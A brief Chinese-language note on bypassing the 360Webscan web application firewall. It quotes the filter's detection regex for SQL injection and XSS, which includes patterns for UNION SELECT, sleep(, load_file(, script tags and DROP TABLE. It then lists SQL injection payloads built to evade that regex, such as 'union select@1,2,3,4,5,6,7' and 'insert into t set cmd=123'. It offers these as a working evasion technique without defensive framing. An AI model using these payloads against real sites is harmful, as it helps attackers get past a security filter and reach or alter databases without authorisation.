360Webscan Bypass

来到select正则：

\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b( and | or )\b\s*?([\(\) '"\d]+?=[\(\)' "\d]+?|[\(\) '"a-zA-Z]+?=[\(\)' "a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?[ "'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|'|" ).*?(`| '|"))|UPDATE@{0,2}(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|' |").*?(`| '|"))FROM(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|\/\*.*?\*\/|'

Bypass：

union select@1,2,3,4,5,6,7

union select@1=@1,2,3,4,5,6,7

insert正则部分：

INSERT\s+INTO.+?(VALUES|SET)

Bypass：

insert into t set cmd=123